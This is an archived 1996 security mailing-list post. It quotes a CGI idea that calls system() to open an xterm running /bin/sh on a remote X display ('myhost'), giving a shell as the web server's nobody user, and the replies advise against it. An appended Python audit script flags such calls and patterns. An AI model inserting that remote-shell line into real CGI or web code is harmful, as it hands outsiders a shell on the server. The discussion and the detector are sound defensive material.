[3692] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Byron Chun)
Wed Dec 4 15:01:27 1996
Date: Wed, 4 Dec 1996 09:31:47 -0800
To: www-security@ns2.rutgers.edu
From: Byron Chun <byron@wellsfargo.com>
Errors-To: owner-www-security@ns2.rutgers.edu
I don't think putting system(), fork(), or other such calls is a good idea,
even if it simplifies the task, since you are risking a system compromise.
Byron Chun
Beware of Trojan Horses.
At 02:15 AM 12/4/96 -0500, Brian Harvell wrote:
>>
>> I was experimenting with cgi scripts when I came up with this idea:
>>
>> What if I have a cgi script which does the following:
>> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>>
>> I can now pop an xterm on my display as nobody.
>> This way any user can gain access to the nobody account and
>> have fun with it...
>>
>> Has this been discussed anywhere?
>> Is there a fix out there?
>>
>Yeah don't do it. You can do things a lot worse if you wanted.
>
>Brian
>
>
>Brian Harvell harvell@iNet.net http://www.iNet.net/~harvell
>echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq'|dc
>
>
>
===================================
Byron Chun
byron@wellsfargo.com
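
Added example (not part of the original messages and not any poster's code): a small Python audit that flags CGI sources containing the process-spawning calls named in the reply above, plus the remote X display pattern from the quoted script. The function name, the extra popen/exec patterns and the two sample scripts are assumptions constructed for illustration.

```python
import re

# Process-spawning constructs to flag. system() and fork() are the calls named
# in the thread; popen and the exec family are assumed additions of the same kind.
SPAWN_CALL = re.compile(r"\b(system|popen|fork|exec[lv]?p?e?)\s*\(")
# An X client pointed at a remote display, as in the quoted xterm line.
REMOTE_DISPLAY = re.compile(r"-display\s+[\w.-]+:\d+")
# A shell named as the command to run.
SHELL_PATH = re.compile(r"/bin/(sh|csh|ksh|bash)\b")


def audit_source(name, text):
    """Return (name, line_no, reason) for each suspicious line in one script."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        # Skip whole-line comments (Perl, sh, C); this also skips the #! line.
        if stripped.startswith(("#", "//", "/*", "*")):
            continue
        call = SPAWN_CALL.search(line)
        if call:
            findings.append((name, line_no, "spawns a process via %s()" % call.group(1)))
        if REMOTE_DISPLAY.search(line):
            findings.append((name, line_no, "opens a window on a remote X display"))
        if SHELL_PATH.search(line):
            findings.append((name, line_no, "names a shell as the command to run"))
    return findings


# Constructed sample: a Perl CGI wrapping the line quoted in the thread.
POPXTERM = r'''#!/usr/bin/perl
print "Content-type: text/plain\n\n";
system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&");
'''

# Constructed sample: a CGI that only prints, which should produce no findings.
HELLO = r'''#!/usr/bin/perl
print "Content-type: text/plain\n\n";
print "hello\n";
'''

if __name__ == "__main__":
    for script, source in (("popxterm.cgi", POPXTERM), ("hello.cgi", HELLO)):
        for finding in audit_source(script, source):
            print("%s:%d: %s" % finding)
```

A match is a prompt for manual review of the script, not proof of abuse; many legitimate CGI programs of the period call system() for ordinary reasons.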
"Calm down. It's only 1's and 0's."